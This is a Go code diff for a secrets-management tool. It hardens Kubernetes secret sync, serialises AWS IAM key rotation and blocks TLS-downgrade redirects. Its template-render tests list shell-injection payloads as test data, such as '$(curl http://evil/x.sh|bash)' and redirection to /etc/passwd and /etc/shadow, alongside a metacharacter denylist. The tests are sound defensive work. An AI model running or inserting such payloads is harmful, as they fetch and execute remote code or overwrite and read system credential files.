+			// buildDesired) just skips this pass and retries next time: the value
+			// may still be valid, so the existing Secret is left completely
+			// untouched rather than written with a key missing or removed outright.
+			res.Failed++
+			res.Errors = append(res.Errors, fmt.Sprintf("%s: %v", t, ferr))
+			continue
+		}
+
+		if len(revokedRefs) > 0 {
+			// #140 / G05: a DEFINITIVE failure for one or more mappings (the
+			// upstream secret was deleted, or this agent's access to it was
+			// revoked — 404/401/403, never a transient network/5xx error) must
+			// propagate to the cluster rather than being left at its last-known,
+			// possibly-compromised or now-unauthorized value indefinitely (skip
+			// and retry never converges, since the SAME definitive failure
+			// recurs every pass). Only the affected key(s) are dropped here —
+			// unrelated keys mapped to the same target Secret that fetched fine
+			// are still applied below; the Secret itself is removed only if
+			// buildDesired left nothing valid for it at all.
+			action := "dropping the affected key(s) from the Secret"
+			if len(desired) == 0 {
+				action = "removing the now-empty Secret entirely"
+			}
+			res.Errors = append(res.Errors, fmt.Sprintf("%s: upstream secret gone or access revoked for %s; %s", t, strings.Join(revokedRefs, ", "), action))
+		}
+
+		if len(desired) == 0 {
+			// Every mapping for this target came back revoked/gone: nothing valid
+			// remains to materialize, so the stale Secret is removed outright.
+			if e.dryRun {
 				res.Revoked++
 				continue
 			}
-			res.Failed++
-			res.Errors = append(res.Errors, fmt.Sprintf("%s: %v", t, ferr))
+			if derr := e.sink.Delete(ctx, t.namespace, t.name); derr != nil {
+				res.Failed++
+				res.Errors = append(res.Errors, fmt.Sprintf("%s: failed to remove revoked secret: %v", t, derr))
+				continue
+			}
+			res.Revoked++
 			continue
 		}
 
@@ -266,18 +288,32 @@ func NewEngine(fetcher Fetcher, sink Sink, opts ...Option) *Engine {
 }
 
 // buildDesired fetches every mapping's referenced value and assembles the target
-// Secret's desired data map. Any fetch error fails the whole target (so a transient
-// failure can't silently drop a key from an otherwise-complete Secret).
-func (e *Engine) buildDesired(ctx context.Context, mappings []SecretMapping) (map[string][]byte, error) {
-	desired := make(map[string][]byte, len(mappings))
+// Secret's desired data map. The two fetch-error cases are handled differently:
+//
+//   - ErrUpstreamGone (a DEFINITIVE failure: the referenced Keyorix secret was
+//     deleted, or this agent's access was revoked) drops only THAT mapping's key
+//     from the desired map and records its ref in the returned revoked slice, then
+//     keeps fetching the rest — so one revoked key never discards the other,
+//     still-valid keys mapped to the same target Secret.
+//   - Any OTHER (transient network/5xx) error aborts the whole build and returns
+//     an error: the value may still be valid, so a transient blip must not
+//     silently drop — nor overwrite with a partial result — a key from an
+//     otherwise-complete Secret. The caller skips this target entirely for the
+//     pass in that case.
+func (e *Engine) buildDesired(ctx context.Context, mappings []SecretMapping) (desired map[string][]byte, revoked []string, err error) {
+	desired = make(map[string][]byte, len(mappings))
 	for _, m := range mappings {
-		val, err := e.fetcher.Fetch(ctx, m.Ref)
-		if err != nil {
-			return nil, fmt.Errorf("fetch %q: %w", m.Ref, err)
+		val, ferr := e.fetcher.Fetch(ctx, m.Ref)
+		if ferr != nil {
+			if errors.Is(ferr, ErrUpstreamGone) {
+				revoked = append(revoked, m.Ref)
+				continue
+			}
+			return nil, nil, fmt.Errorf("fetch %q: %w", m.Ref, ferr)
 		}
 		desired[m.Key] = val
 	}
-	return desired, nil
+	return desired, revoked, nil
 }
 
 // groupByTarget buckets mappings by their target Secret, validating each and

--- a/internal/k8ssync/sync_test.go
+++ b/internal/k8ssync/sync_test.go
@@ -235,6 +235,70 @@ func TestReconcile_RevokedUpstreamDryRunReportsButDoesNotDelete(t *testing.T) {
 	assert.Empty(t, s.deleted, "dry-run must not delete anything")
 }
 
+// TestReconcile_RevokedSingleKeyKeepsUnrelatedKeysInSameSecret pins the G05 fix: a
+// target Secret backed by SEVERAL mappings (several distinct Keyorix refs, each its
+// own key) must not be deleted wholesale just because ONE of those refs comes back
+// ErrUpstreamGone (its lease independently revoked/rotated, or the secret deleted).
+// The other, still-valid keys must survive — the Secret is updated to drop only the
+// revoked key, never deleted outright, so unrelated workload-relied-upon keys in the
+// same Secret aren't collaterally destroyed by one key's definitive failure.
+func TestReconcile_RevokedSingleKeyKeepsUnrelatedKeysInSameSecret(t *testing.T) {
+	f := &fakeFetcher{
+		values:  map[string][]byte{"prod/api": []byte("k3y")},
+		revoked: map[string]bool{"prod/db": true},
+	}
+	s := newFakeSink()
+	s.existing["app/creds"] = map[string][]byte{
+		"DB_PASSWORD": []byte("stale-value"),
+		"API_KEY":     []byte("k3y"),
+	}
+	s.owned["app/creds"] = true
+	e := NewEngine(f, s)
+
+	res, err := e.Reconcile(context.Background(), []SecretMapping{
+		{Ref: "prod/db", Namespace: "app", Name: "creds", Key: "DB_PASSWORD"},
+		{Ref: "prod/api", Namespace: "app", Name: "creds", Key: "API_KEY"},
+	})
+	require.NoError(t, err)
+
+	assert.Empty(t, s.deleted, "the whole Secret must not be deleted over one revoked key")
+	assert.Equal(t, 0, res.Revoked, "the target itself was not removed, only trimmed")
+
+	got, stillExists := s.existing["app/creds"]
+	require.True(t, stillExists, "the Secret must still exist")
+	assert.Equal(t, map[string][]byte{"API_KEY": []byte("k3y")}, got,
+		"the still-valid key must survive; only the revoked key is dropped")
+
+	require.Len(t, res.Errors, 1)
+	assert.Contains(t, res.Errors[0], "revoked")
+	assert.Contains(t, res.Errors[0], "prod/db")
+}
+
+// TestReconcile_RevokedAllKeysStillDeletesSecret confirms the existing single-mapping
+// behavior generalizes correctly: when EVERY mapping for a target is revoked/gone
+// (not just one of several), nothing valid remains and the Secret is still removed
+// entirely, exactly as before the G05 fix.
+func TestReconcile_RevokedAllKeysStillDeletesSecret(t *testing.T) {
+	f := &fakeFetcher{revoked: map[string]bool{"prod/db": true, "prod/api": true}}
+	s := newFakeSink()
+	s.existing["app/creds"] = map[string][]byte{
+		"DB_PASSWORD": []byte("stale-value"),
+		"API_KEY":     []byte("also-stale"),
+	}
+	s.owned["app/creds"] = true
+	e := NewEngine(f, s)
+
+	res, err := e.Reconcile(context.Background(), []SecretMapping{
+		{Ref: "prod/db", Namespace: "app", Name: "creds", Key: "DB_PASSWORD"},
+		{Ref: "prod/api", Namespace: "app", Name: "creds", Key: "API_KEY"},
+	})
+	require.NoError(t, err)
+	assert.Equal(t, 1, res.Revoked)
+	assert.Contains(t, s.deleted, "app/creds")
+	_, stillExists := s.existing["app/creds"]
+	assert.False(t, stillExists)
+}
+
 func TestReconcile_DryRunReportsButDoesNotWrite(t *testing.T) {
 	f := &fakeFetcher{values: map[string][]byte{"prod/new": []byte("v"), "prod/chg": []byte("rotated")}}
 	s := newFakeSink()

--- a/internal/rotation/awsiam.go
+++ b/internal/rotation/awsiam.go
@@ -9,6 +9,7 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
+	"sync"
 	"time"
 
 	"github.com/aws/aws-sdk-go-v2/aws"
@@ -33,6 +34,44 @@ type AWSIAMExecutor struct {
 	allowedRefs []string
 	// newClient builds an IAM client; nil uses the real client (ambient chain). Tests inject.
 	newClient func(ctx context.Context) (iamAPI, error)
+	// refLocks serializes GenerateUpstream calls against the SAME IAM user (g05):
+	// the list→evict→create→delete sequence below is an unsynchronized read-modify-
+	// write against AWS IAM, so two concurrent calls for one ref (e.g. the
+	// single-replica-gated auto-rotation scheduler tick — server/main.go,
+	// schedLockAutoRotate — racing a manually-triggered on-demand rotation, both of
+	// which run as goroutines in the SAME process and share this executor instance)
+	// can interleave: both may see the user below the two-key cap and both create a
+	// key (one CreateAccessKey then fails outright at AWS's hard limit), or one
+	// call's cleanup can delete a key the other call just minted and is about to
+	// hand back to its own caller as "the" live credential.
+	//
+	// Keyed per ref (not one global lock) so rotations for DIFFERENT IAM users still
+	// run concurrently. A plain sync.Map (rather than core.KeyorixCore's fixed-shard
+	// loginFailureMu array) is fine here: refs are drawn from allowedRefs, an
+	// operator-configured allowlist, not attacker-controlled cardinality.
+	//
+	// This closes the race WITHIN one Keyorix process — the primary reachable case,
+	// since the scheduler ticker and the HTTP/gRPC on-demand handlers all run in the
+	// server's own process. It does NOT close the same race across two HA replicas
+	// (ADR-039): e.g. two on-demand rotations for the same secret landing on
+	// different replicas at once, or an on-demand rotation on replica A racing the
+	// auto-rotation scheduler tick running on replica B. The scheduler tick itself
+	// is already single-replica-gated (schedLockAutoRotate via
+	// storage.WithSchedulerLock), so that residual window is narrower than the case
+	// fixed here; fully closing it needs a keyed *distributed* lock — the closest
+	// existing precedent is storage.WithAuditCheckpointLock (ADR-029), which blocks
+	// rather than skips, but is a single global lock, not keyed per identity.
+	// Extending it here would be a Storage-interface change spanning Local/Remote
+	// backends, out of scope for this fix.
+	refLocks sync.Map // map[string]*sync.Mutex
+}
+
+// lockRef returns the mutex serializing GenerateUpstream calls for ref, creating one
+// on first use. The mutex is never removed — see refLocks' doc comment for why that's
+// fine (bounded, operator-configured ref cardinality).
+func (e *AWSIAMExecutor) lockRef(ref string) *sync.Mutex {
+	v, _ := e.refLocks.LoadOrStore(ref, &sync.Mutex{})
+	return v.(*sync.Mutex)
 }
 
 // NewAWSIAMExecutor builds an AWS IAM rotation executor. region configures the client
@@ -81,6 +120,14 @@ func (e *AWSIAMExecutor) GenerateUpstream(ctx context.Context, ref string) (stri
 	if !prefixAllowed(e.allowedRefs, ref) {
 		return "", fmt.Errorf("aws-iam: user %q is not permitted by this backend's allowed_refs", ref)
 	}
+	// Serialize against any other in-flight GenerateUpstream for this SAME ref (g05)
+	// — see refLocks' doc comment. Held for the entire list/evict/create/delete
+	// sequence below, not just individual calls, so a second caller for this ref
+	// never observes (or acts on) an intermediate state left by the first.
+	mu := e.lockRef(ref)
+	mu.Lock()
+	defer mu.Unlock()
+
 	cl, err := e.client(ctx)
 	if err != nil {
 		return "", err

--- a/internal/rotation/awsiam_test.go
+++ b/internal/rotation/awsiam_test.go
@@ -4,7 +4,10 @@ import (
 	"context"
 	"encoding/json"
 	"errors"
+	"fmt"
+	"sync"
 	"testing"
+	"time"
 
 	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/iam"
@@ -142,4 +145,215 @@ func TestAWSIAM_GenerateUpstream_Errors(t *testing.T) {
 		require.Error(t, err)
 		assert.Contains(t, err.Error(), "LimitExceeded")
 	})
+}
+
+// raceFakeIAM is a concurrency-safe, orchestratable fake of a real IAM user's access
+// key state — used only by TestAWSIAM_GenerateUpstream_ConcurrentSameRef below to
+// deterministically reproduce the g05 unsynchronized-race finding. Unlike fakeIAM
+// (whose fields are only ever mutated by one goroutine at a time in every other
+// test), this fake must itself be safe under concurrent calls, and provides hooks to
+// force a specific interleaving between two concurrent GenerateUpstream calls for
+// the SAME ref.
+type raceFakeIAM struct {
+	mu      sync.Mutex
+	keys    []string             // current live access key ids, mutation-guarded by mu
+	created map[string]time.Time // id -> CreateDate, so evictableAccessKey picks realistically
+	seq     int
+
+	listCalls int
+	// aListed is closed the instant the FIRST ListAccessKeys call (call "A") returns
+	// its snapshot — the test uses this to know it is now safe to start the second
+	// concurrent caller ("B") without risking B racing ahead to be the first Lister.
+	aListed chan struct{}
+	// createLanded is closed the instant the first CreateAccessKey call's new key is
+	// appended to `keys` (i.e. visible to a subsequent List) — letting B's List (the
+	// second List call) proceed only once A's new key genuinely exists upstream,
+	// exactly the moment a live race would let B observe it.
+	createLanded chan struct{}
+	// releaseCreate is closed by the test to let the FIRST CreateAccessKey call
+	// return control to its caller (A), after B has been allowed to run its entire
+	// GenerateUpstream call to completion first. This is what manufactures the
+	// dangerous interleaving: A believes it is still mid-rotation while B has
+	// already listed, evicted, created, and cleaned up against the same ref.
+	releaseCreate chan struct{}
+}
+
+func newRaceFakeIAM(seedKeyID string, seedAge time.Duration) *raceFakeIAM {
+	return &raceFakeIAM{
+		keys:          []string{seedKeyID},
+		created:       map[string]time.Time{seedKeyID: time.Now().Add(-seedAge)},
+		aListed:       make(chan struct{}),
+		createLanded:  make(chan struct{}),
+		releaseCreate: make(chan struct{}),
+	}
+}
+
+func (f *raceFakeIAM) ListAccessKeys(_ context.Context, in *iam.ListAccessKeysInput, _ ...func(*iam.Options)) (*iam.ListAccessKeysOutput, error) {
+	f.mu.Lock()
+	n := f.listCalls
+	f.listCalls++
+	f.mu.Unlock()
+
+	if n == 0 {
+		defer close(f.aListed)
+	} else {
+		// The second concurrent List (B's) only proceeds once A's create has landed
+		// — i.e. once there is something new upstream for B to (wrongly) sweep up.
+		<-f.createLanded
+	}
+
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	md := make([]iamtypes.AccessKeyMetadata, 0, len(f.keys))
+	for _, id := range f.keys {
+		id := id
+		ct := f.created[id]
+		md = append(md, iamtypes.AccessKeyMetadata{AccessKeyId: &id, CreateDate: &ct, UserName: in.UserName})
+	}
+	return &iam.ListAccessKeysOutput{AccessKeyMetadata: md}, nil
+}
+
+func (f *raceFakeIAM) CreateAccessKey(_ context.Context, in *iam.CreateAccessKeyInput, _ ...func(*iam.Options)) (*iam.CreateAccessKeyOutput, error) {
+	f.mu.Lock()
+	// Mirror AWS's real hard two-key-per-user cap: a properly serialized rotation
+	// never calls Create while already at 2 keys (it evicts first); an interleaved
+	// one can, and here it fails exactly like AWS would.
+	if len(f.keys) >= 2 {
+		f.mu.Unlock()
+		return nil, fmt.Errorf("LimitExceeded: cannot create more than 2 access keys")
+	}
+	f.seq++
+	id := fmt.Sprintf("KNEW%d", f.seq)
+	f.keys = append(f.keys, id)
+	f.created[id] = time.Now()
+	first := f.seq == 1
+	f.mu.Unlock()
+
+	if first {
+		close(f.createLanded)
+		// Hold A here — after AWS-side creation has already landed — until the test
+		// lets B run its entire concurrent rotation to completion first.
+		<-f.releaseCreate
+	}
+	return &iam.CreateAccessKeyOutput{AccessKey: &iamtypes.AccessKey{
+		AccessKeyId: aws.String(id), SecretAccessKey: aws.String("secret-" + id), UserName: in.UserName,
+	}}, nil
+}
+
+func (f *raceFakeIAM) DeleteAccessKey(_ context.Context, in *iam.DeleteAccessKeyInput, _ ...func(*iam.Options)) (*iam.DeleteAccessKeyOutput, error) {
+	id := aws.ToString(in.AccessKeyId)
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	out := f.keys[:0]
+	found := false
+	for _, k := range f.keys {
+		if k == id {
+			found = true
+			continue
+		}
+		out = append(out, k)
+	}
+	f.keys = out
+	if !found {
+		// Real AWS DeleteAccessKey on an already-gone key id returns NoSuchEntity —
+		// which is exactly what happens when a concurrent rotation already deleted
+		// this same key out from under the caller.
+		return nil, fmt.Errorf("NoSuchEntity: access key %s not found", id)
+	}
+	return &iam.DeleteAccessKeyOutput{}, nil
+}
+
+func (f *raceFakeIAM) liveKeys() []string {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	return append([]string(nil), f.keys...)
+}
+
+// TestAWSIAM_GenerateUpstream_ConcurrentSameRef reproduces the g05 finding:
+// GenerateUpstream performs an unsynchronized list→evict→create→delete sequence
+// against AWS IAM, so two concurrent calls for the SAME ref (e.g. the auto-rotation
+// scheduler tick racing a manually-triggered on-demand rotation — both reachable in
+// the same process) can interleave.
+//
+// Orchestration: the IAM user starts with one key (K0, seeded old). Call "A" lists
+// (sees only K0, below the 2-key cap, so no eviction) and creates a new key — which
+// is deliberately held from returning to A's Go code until call "B" has been allowed
+// to run its ENTIRE GenerateUpstream to completion. Pre-fix, nothing stops B from
+// doing exactly that: B lists (now sees [K0, A's new key] — AT the cap), evicts the
+// genuinely-oldest K0, creates its own new key, and then — in its final "delete every
+// prior" cleanup — deletes A's brand-new key, the one A is about to report back to
+// ITS OWN caller as the current live credential. Post-fix, B cannot even begin its
+// List until A's mutex-held rotation fully completes, so this interleaving is
+// structurally impossible; the test detects that as B still being blocked after a
+// generous timeout, then lets A finish and confirms both rotations independently
+// leave a fully consistent, sequential result.
+func TestAWSIAM_GenerateUpstream_ConcurrentSameRef(t *testing.T) {
+	fake := newRaceFakeIAM("K0", time.Hour)
+	exec := NewAWSIAMExecutor("aws", "us-east-1", []string{"svc-"})
+	exec.newClient = func(context.Context) (iamAPI, error) { return fake, nil }
+
+	type outcome struct {
+		val string
+		err error
+	}
+	aCh := make(chan outcome, 1)
+	bCh := make(chan outcome, 1)
+
+	go func() {
+		v, err := exec.GenerateUpstream(context.Background(), "svc-app")
+		aCh <- outcome{v, err}
+	}()
+	<-fake.aListed // A has listed (and is on its way to Create); safe to start B now
+
+	go func() {
+		v, err := exec.GenerateUpstream(context.Background(), "svc-app")
+		bCh <- outcome{v, err}
+	}()
+
+	// Pre-fix: nothing blocks B, so it races ahead and finishes almost immediately.
+	// Post-fix: B is blocked acquiring the per-ref mutex A already holds, and will
+	// NOT complete until A does — which A cannot do until we release it below. This
+	// wait is not a flaky timing race: whichever branch fires is fully determined by
+	// whether the fix's mutex exists, not by scheduling luck.
+	var b outcome
+	bDone := false
+	select {
+	case b = <-bCh:
+		bDone = true
+	case <-time.After(2 * time.Second):
+		// Expected once serialized: B is correctly still waiting for A's lock.
+	}
+
+	// The core g05 assertion, taken RIGHT HERE — before A is released to resume —
+	// because this is the only point that is not itself racing B's independent
+	// execution: if B already fully completed while A was still parked mid-flight,
+	// A's own brand-new key (deterministically "KNEW1": the aListed gate above
+	// guarantees A is always the first Create call) must still exist upstream. A is
+	// about to report that exact id back to its own caller as the current live
+	// credential — if it's already gone, that's a caller being handed a credential
+	// invalidated before it was ever returned, the danger this fix closes. (Once B
+	// is legitimately allowed to run a SEPARATE, later rotation of the same secret
+	// after A has actually returned, it deleting A's now-superseded key is normal,
+	// not a bug — which is why this check must happen now, not after both finish.)
+	if bDone {
+		assert.Contains(t, fake.liveKeys(), "KNEW1",
+			"call B's concurrent rotation for the same ref already deleted call A's brand-new access key %q before A had even reported it as the current credential — the exact g05 race", "KNEW1")
+	}
+
+	close(fake.releaseCreate) // let A's held Create return; A can now finish
+	a := <-aCh
+	if !bDone {
+		b = <-bCh // now that A released the lock, B must finish too
+	}
+
+	// Once properly serialized, neither call should ever need the partial-failure
+	// path — every delete a call attempts is always of a key it alone is entitled to
+	// remove, so it always succeeds. (Pre-fix, A's own final cleanup attempts to
+	// delete a key B already removed, surfacing exactly as this kind of error.)
+	require.NoError(t, a.err, "call A should not need PartialRotationError when properly serialized")
+	require.NoError(t, b.err, "call B should not need PartialRotationError when properly serialized")
+
+	// Exactly one access key should remain live after two full rotations of the same
+	// ref have completed, run one after the other rather than interleaved.
+	assert.Len(t, fake.liveKeys(), 1, "exactly one access key should remain live after two serialized rotations")
 }

--- a/internal/secrettemplate/render.go
+++ b/internal/secrettemplate/render.go
@@ -142,6 +142,21 @@ func Render(tmpl string, resolve Resolver) (string, error) {
 		if strings.ContainsAny(val, "\n\r\x00") {
 			return "", fmt.Errorf("resolve %q: secret value contains a newline, carriage return, or NUL byte and cannot be safely substituted into a single-line template output", ref)
 		}
+		// The newline/CR/NUL check above closes the multi-line variant of the
+		// bash-`source .env` RCE this package documents as its motivating threat,
+		// but an *unquoted* shell assignment (`KEY=value`, the exact shape a
+		// rendered .env line takes) still evaluates its right-hand side even on a
+		// single line: a value of "$(curl evil|bash)", a backtick-quoted command,
+		// a bare ";"/"|"/"&" command separator, or a "<"/">" redirection all
+		// execute or take effect when the file is later sourced, with no newline
+		// required. Reject the classic shell metacharacters for the same reason
+		// we reject newlines: fail the render rather than silently ship a value
+		// that runs as code (or redirects output) in the documented consumption
+		// path. (This is a denylist and therefore incomplete defense-in-depth,
+		// not a substitute for shell-quoting the output.)
+		if strings.ContainsAny(val, "`;|&<>") || strings.Contains(val, "$(") {
+			return "", fmt.Errorf("resolve %q: secret value contains a shell metacharacter and cannot be safely substituted into output that may later be sourced as a shell script", ref)
+		}
 		resolved[ref] = val
 	}
 

--- a/internal/secrettemplate/render_test.go
+++ b/internal/secrettemplate/render_test.go
@@ -11,17 +11,21 @@ import (
 )
 
 // upper is a trivial resolver that echoes a value per ref, or errors on "missing".
+// The marker is square brackets, not angle brackets: "<"/">" are now guarded shell
+// redirection metacharacters (see TestRender_RejectsShellMetacharacters), so a real
+// resolved value can't contain them — bracket markers keep this fixture distinguishable
+// from literal template text without colliding with that guard.
 func fakeResolve(ref string) (string, error) {
 	if ref == "missing" {
 		return "", errors.New("not found")
 	}
-	return "<" + ref + ">", nil
+	return "[" + ref + "]", nil
 }
 
 func TestRender_ExpandsReferences(t *testing.T) {
 	out, err := Render("db=${secret:prod/db} api=${secret:prod/api}", fakeResolve)
 	require.NoError(t, err)
-	assert.Equal(t, "db=<prod/db> api=<prod/api>", out)
+	assert.Equal(t, "db=[prod/db] api=[prod/api]", out)
 }
 
 func TestRender_NoPlaceholders(t *testing.T) {
@@ -40,7 +44,7 @@ func TestRender_DollarEscape(t *testing.T) {
 func TestRender_TrimsRef(t *testing.T) {
 	out, err := Render("${secret:  prod/db  }", fakeResolve)
 	require.NoError(t, err)
-	assert.Equal(t, "<prod/db>", out)
+	assert.Equal(t, "[prod/db]", out)
 }
 
 func TestRender_Errors(t *testing.T) {
@@ -64,7 +68,7 @@ func TestRender_Errors(t *testing.T) {
 func TestRender_AdjacentAndRepeated(t *testing.T) {
 	out, err := Render("${secret:a}${secret:a}${secret:b}", fakeResolve)
 	require.NoError(t, err)
-	assert.Equal(t, "<a><a><b>", out)
+	assert.Equal(t, "[a][a][b]", out)
 }
 
 func TestReferences(t *testing.T) {
@@ -115,6 +119,58 @@ func TestRender_RejectsEmbeddedControlChars(t *testing.T) {
 	}
 }
 
+// A secret value carrying a shell metacharacter (backtick, ";", "|", "&", "<", ">", or a
+// "$(" command-substitution opener) must abort the render, matching the newline/CR/NUL
+// guard's all-or-nothing failure model. This closes the single-line variant of the
+// bash-`source .env` RCE: unlike an embedded newline, none of these characters need a
+// second line to take effect in an *unquoted* `KEY=value` assignment — the exact shape a
+// rendered .env line takes — so the render must reject them just as eagerly.
+func TestRender_RejectsShellMetacharacters(t *testing.T) {
+	cases := map[string]string{
+		"command substitution": "$(curl http://evil/x.sh|bash)",
+		"backtick command":     "`curl http://evil/x.sh|bash`",
+		"semicolon separator":  "foo; curl http://evil/x.sh|bash",
+		"pipe":                 "foo|bash",
+		"background ampersand": "foo & curl http://evil/x.sh|bash",
+		"output redirection":   "foo>/etc/passwd",
+		"input redirection":    "foo</etc/shadow",
+	}
+	for name, val := range cases {
+		t.Run(name, func(t *testing.T) {
+			resolve := func(ref string) (string, error) { return val, nil }
+			_, err := Render("SECRET=${secret:prod/db}", resolve)
+			require.Error(t, err)
+			assert.Contains(t, err.Error(), `resolve "prod/db"`)
+			assert.Contains(t, err.Error(), "cannot be safely substituted")
+		})
+	}
+}
+
+// The shell-metacharacter rejection must fire per-reference too: an earlier clean
+// reference followed by a later poisoned one must still fail with no partial output.
+func TestRender_RejectsShellMetacharacters_NoPartialOutput(t *testing.T) {
+	resolve := func(ref string) (string, error) {
+		if ref == "prod/clean" {
+			return "cleanvalue", nil
+		}
+		return "$(curl evil|bash)", nil
+	}
+	out, err := Render("A=${secret:prod/clean} B=${secret:prod/dirty}", resolve)
+	require.Error(t, err)
+	assert.Empty(t, out)
+}
+
+// A secret value that legitimately contains a lone "$" (not part of "$(") must still
+// render unchanged — the guard targets command substitution and separator syntax, not
+// every dollar sign, since secret values (e.g. regex patterns, prices) may contain one
+// without being dangerous in a sourced .env context.
+func TestRender_AllowsLoneDollarSign(t *testing.T) {
+	resolve := func(ref string) (string, error) { return "price=$5.00", nil }
+	out, err := Render("VALUE=${secret:prod/price}", resolve)
+	require.NoError(t, err)
+	assert.Equal(t, "VALUE=price=$5.00", out)
+}
+
 // The rejection must fire per-reference: a template with an earlier clean reference and
 // a later poisoned one must still fail (no partial output containing the clean value
 // followed by a truncated/injected tail).
@@ -138,7 +194,7 @@ func TestRender_DedupesRepeatedReferences(t *testing.T) {
 	calls := map[string]int{}
 	resolve := func(ref string) (string, error) {
 		calls[ref]++
-		return "<" + ref + ">", nil
+		return "[" + ref + "]", nil
 	}
 
 	var tmpl strings.Builder
@@ -149,7 +205,7 @@ func TestRender_DedupesRepeatedReferences(t *testing.T) {
 	require.NoError(t, err)
 
 	assert.Equal(t, 1, calls["prod/db"], "resolve must be called exactly once for 5000 occurrences of the same reference")
-	assert.Equal(t, strings.Repeat("<prod/db>", 5000), out, "every occurrence still substitutes the resolved value")
+	assert.Equal(t, strings.Repeat("[prod/db]", 5000), out, "every occurrence still substitutes the resolved value")
 }
 
 // A template naming multiple distinct references, some of which repeat, must resolve
@@ -159,7 +215,7 @@ func TestRender_DedupesRepeatedReferences_MultipleDistinct(t *testing.T) {
 	calls := map[string]int{}
 	resolve := func(ref string) (string, error) {
 		calls[ref]++
-		return "<" + ref + ">", nil
+		return "[" + ref + "]", nil
 	}
 
 	tmpl := strings.Repeat("${secret:a}${secret:b}${secret:a}${secret:c}${secret:b}", 200)
@@ -169,7 +225,7 @@ func TestRender_DedupesRepeatedReferences_MultipleDistinct(t *testing.T) {
 	assert.Equal(t, 1, calls["a"])
 	assert.Equal(t, 1, calls["b"])
 	assert.Equal(t, 1, calls["c"])
-	assert.Equal(t, strings.Repeat("<a><b><a><c><b>", 200), out)
+	assert.Equal(t, strings.Repeat("[a][b][a][c][b]", 200), out)
 }
 
 // #443: even after dedup, a template naming more DISTINCT references than
@@ -197,13 +253,13 @@ func TestRender_RejectsTooManyDistinctReferences(t *testing.T) {
 // A template naming exactly MaxDistinctReferences distinct references — the boundary —
 // must still be accepted and render correctly.
 func TestRender_AllowsExactlyMaxDistinctReferences(t *testing.T) {
-	resolve := func(ref string) (string, error) { return "<" + ref + ">", nil }
+	resolve := func(ref string) (string, error) { return "[" + ref + "]", nil }
 
 	var tmpl strings.Builder
 	var want strings.Builder
 	for i := 0; i < MaxDistinctReferences; i++ {
 		fmt.Fprintf(&tmpl, "${secret:ref-%d}", i)
-		fmt.Fprintf(&want, "<ref-%d>", i)
+		fmt.Fprintf(&want, "[ref-%d]", i)
 	}
 	out, err := Render(tmpl.String(), resolve)
 	require.NoError(t, err)
@@ -213,10 +269,10 @@ func TestRender_AllowsExactlyMaxDistinctReferences(t *testing.T) {
 // A normal, reasonably-sized template with a handful of distinct references (well
 // under the cap, no duplicates) renders exactly as before this change.
 func TestRender_NormalTemplateUnaffected(t *testing.T) {
-	resolve := func(ref string) (string, error) { return "<" + ref + ">", nil }
+	resolve := func(ref string) (string, error) { return "[" + ref + "]", nil }
 	out, err := Render("host=${secret:prod/host} user=${secret:prod/user} pass=${secret:prod/pass}", resolve)
 	require.NoError(t, err)
-	assert.Equal(t, "host=<prod/host> user=<prod/user> pass=<prod/pass>", out)
+	assert.Equal(t, "host=[prod/host] user=[prod/user] pass=[prod/pass]", out)
 }
 
 // References() must respect the same distinct-reference cap as Render, since it shares

--- a/internal/storage/remote/client.go
+++ b/internal/storage/remote/client.go
@@ -56,11 +56,24 @@ func NewHTTPClient(config *Config) (*HTTPClient, error) {
 	// Create HTTP client with timeout. Refuse a redirect to a different host so a
 	// compromised/misbehaving server can't bounce the token-bearing request elsewhere
 	// (Go already strips the Authorization header cross-host, but don't follow at all).
+	// Also refuse a redirect that downgrades from https to a non-https scheme on the
+	// same host: validateBaseURL (config.go) requires https for every non-loopback
+	// base_url, so a same-host https->http redirect (e.g. from a compromised
+	// intermediary/reverse-proxy) would otherwise silently strip TLS and send the
+	// bearer API key, and any request/response body, in cleartext. An initial
+	// request that legitimately starts on http (the loopback-only dev exception in
+	// validateBaseURL) is unaffected -- this only fires once the chain has already
+	// been on https.
 	httpClient := &http.Client{
 		Timeout: config.GetTimeout(),
 		CheckRedirect: func(req *http.Request, via []*http.Request) error {
-			if len(via) > 0 && req.URL.Host != via[0].URL.Host {
-				return fmt.Errorf("remote: refusing redirect to a different host %q", req.URL.Host)
+			if len(via) > 0 {
+				if req.URL.Host != via[0].URL.Host {
+					return fmt.Errorf("remote: refusing redirect to a different host %q", req.URL.Host)
+				}
+				if via[0].URL.Scheme == "https" && req.URL.Scheme != "https" {
+					return fmt.Errorf("remote: refusing redirect from https to %q (TLS downgrade)", req.URL.Scheme)
+				}
 			}
 			return nil
 		},

--- a/internal/storage/remote/client_test.go
+++ b/internal/storage/remote/client_test.go
@@ -41,6 +41,84 @@ func TestNewHTTPClient_InvalidConfig(t *testing.T) {
 	assert.Error(t, err)
 }
 
+// TestHTTPClient_CheckRedirect_RejectsHTTPSDowngrade guards against a
+// same-host redirect that strips TLS (e.g. from a compromised/misbehaving
+// intermediary): if the chain started on https, a redirect to any other
+// scheme on the same host must be rejected, or the bearer API key and any
+// response body would be sent in cleartext. httptest.NewServer/NewTLSServer
+// bind to distinct 127.0.0.1:port host:port pairs, so a real end-to-end
+// redirect can't isolate the scheme check from the pre-existing cross-host
+// check -- this exercises the CheckRedirect closure directly instead, with
+// constructed requests, the same way the cross-host case below does.
+func TestHTTPClient_CheckRedirect_RejectsHTTPSDowngrade(t *testing.T) {
+	config := &Config{
+		BaseURL:        "https://api.example.com",
+		APIKey:         "test-key",
+		TimeoutSeconds: 30,
+		RetryAttempts:  3,
+		TLSVerify:      true,
+	}
+	client, err := NewHTTPClient(config)
+	require.NoError(t, err)
+	require.NotNil(t, client.client.CheckRedirect)
+
+	originalReq, err := http.NewRequest(http.MethodGet, "https://api.example.com/v1/secrets/foo", nil)
+	require.NoError(t, err)
+	downgradedReq, err := http.NewRequest(http.MethodGet, "http://api.example.com/v1/secrets/foo", nil)
+	require.NoError(t, err)
+
+	err = client.client.CheckRedirect(downgradedReq, []*http.Request{originalReq})
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "downgrade")
+}
+
+// TestHTTPClient_CheckRedirect_AllowsSameHostSameScheme confirms the fix
+// above didn't break the legitimate case: a same-host, same-scheme redirect
+// (e.g. a path change) must still be followed.
+func TestHTTPClient_CheckRedirect_AllowsSameHostSameScheme(t *testing.T) {
+	config := &Config{
